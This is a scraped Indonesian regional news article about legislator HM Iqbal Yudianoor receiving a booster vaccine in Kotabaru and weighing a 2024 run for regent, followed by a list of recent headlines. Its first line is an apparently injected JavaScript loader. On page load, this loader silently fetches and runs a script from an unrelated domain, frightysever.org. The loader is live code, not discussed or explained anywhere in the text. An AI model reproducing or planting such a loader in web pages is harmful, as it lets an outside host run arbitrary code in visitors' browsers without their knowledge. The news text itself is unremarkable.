(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kotabaru

Lama Tak Terlihat, Muncul dengan Style Rambut Gondrong, Iqbal Yudianoor Buka Jalan Kontestasi 2024 Kotabaru?


KANALKALIMANTAN.COM, KOTABARU – Jarang muncul di tengah-tengah khalayak warga Kabupaten Kotabaru, sosok HM Iqbal Yudianoor terlihat mengikuti vaksinasi booster di kawasan masjid Agung Husnul Khotimah, Senin (4/4/2022) malam,serelah pelaksanaan ibadah shalat tarawih.

Hanya saja, penampilannya sedikit berubah utamanya dengan style gaya rambut yang panjang alias sedikit gondrong. Namun, senyum khasnya masih terlihat seperti sebelumnya, bak bintang iklan pasta gigi.

Lelaki yang menjadi wakil rakyat murah senyum dan pernah bertarung dalam kontestasi Pilkada di Kotabaru secara tiba-tiba ada di Kotabaru. Anak Bupati Kotabaru periode 2000-2005 dan 2005-2010 H Sjachrani Mataja, saat kontestasi berpasangan dengan H Sahiduddin melawan beberapa rival lainnya. Pasangan H Sayed Jafar Al Idrus yang menggandeng H Burhanuddin memenangi kontestasi Pilkada -kini menjadi kepala daerah-.

Usai pelaksanaan vaksinasi di kawasan masjid terbesar di Bumi Saijaan, Kanalkalimantan.com berkesempatan bertemu dengannya di salah satu rumah makan di Desa Semayap, Kecamatan Pulau Laut Utara atau di kawasan Jelapat. Ditanya perihal kehadiran dirinya di Kabupaten Kotabaru, dengan santai ia menjawab, baru saja mengikuti vaksinasi booster yang diselenggarakan oleh Polres Kotabaru.

 

 

Baca juga: DKP Kalsel Bagikan Ikan Patin Segar di Pasar Murah HBKN 

Menurut Iqbal, kegiatan vaksinasi di Kabupaten Kotabaru sangat baik sekali yang dilakukan oleh jajaran TNI Polri dalam rangka membantu pemerintah guna percepatan vaksinasi untuk masyarakat.

“Saya pribadi melihat kegiatan vaksinasi di Kotabaru sangat luar biasa. Kebetulan barusan tadi saya ikut vaksin booster yang diselenggarakan oleh Polres Kotabaru. Karena memang harus kita ikuti, apalagi istri saya, asisten rumah tangga dan adik saya beberapa waktu lalu terkena varian virus Omicron, tentu hal tersebut menjadi perhatian besar. Untungnya, saya dan anak saya tidak terpapar. Oleh karenanya, masyarakat harus mengikuti anjuran pemerintah dan jangan sampai takut divaksin serta tetap menerapkan protokol kesehatan dengan baik,” tuturnya.

Ketika disinggung terkait dengan rencana pelaksanaan pesta demokrasi yang akan dihelat pada tahun 2024 mendatang. Ia hanya menjawab, belum menentukan sikap apakah maju lagi atau tidak sebagai calon kepala daerah di Kotabaru.

“Untuk sekarang, karena saya masih aktif di DPRD Provinsi Kalsel tentu masih memikirkan aspirasi masyarakat yang diharapkan dapat terealisasi sesuai harapan. Sebagaimana hasil reses saya beberapa waktu di sini, banyak masukan yang di dapat dan diharapkan bisa terakomodir dengan baik, salah satunya dari warga Kabupaten Kotabaru karena menjadi Dapil saya saat Pileg kemarin selain daerah lainnya,” tambahnya.

Ia sekarang menjabat sebagai Sekretaris Komisi II DPRD Provinsi Kalsel, tak menampik kemungkinan ia akan kembali mencalonkan diri sebagai orang nomor satu di Kabupaten Kotabaru pada kontestasi 2024 nanti.

“Untuk sekarang kita masih fokus menjalankan tugas dan fungsi di legislatif. Soal nanti mencalon lagi atau tidak. Yah, kita lihat nanti lah kan, kalau memang banyak permintaan dari masyarakat bisa saja nanti kita pikirkan. Tapi yang jelas, sekarang saya masih harus menjalankan tugas sebagai anggota DPRD guna membantu masyarakat pada umumnya,” jelasnya.

Baca juga: Terungkap Motif Pembunuhan Perempuan di Jalan Gubernur Syarkawi, Pelaku Ternyata Mantan Suami

Di pengujung pertemuan, kembali ia mengingatkan dan mengimbau masyarakat pada umumnya, untuk tidak longgar dalam penerapan prokes serta jangan sampai lengah menghadapi situasi Covid-19.

Dimintai tanggapan salah seorang warga Kotabaru, Sulaiman menilai, menurutnya sosok HM Iqbal Yudianoor tidak bisa dipandang enteng untuk Pilkada nanti, dan tidak bisa di pungkiri untuk massanya boleh dibilang sangat banyak.

“Kalau di 2024 nanti ternyata HM Iqbal Yudianoor maju di Pilkada. Maka, menjadi perhatian besar bagi rival lainnya. Apalagi sekarang dia masih menjabat sebagai anggota DPRD Provinsi Kalsel tentu massanya bukan main dan kita ketahui bersama ia sudah berapa kali menduduki kursi legislatif di provinsi. Artinya, pendukungnya tak bisa dipandang sebelah mata,” ujarnya. (Kanalkalimantan.com/muhammad)

Reporter : Muhammad
Editor : kk


Risa

Recent Posts

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

2 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

5 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

5 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

5 jam ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

6 jam ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

6 jam ago

This website uses cookies.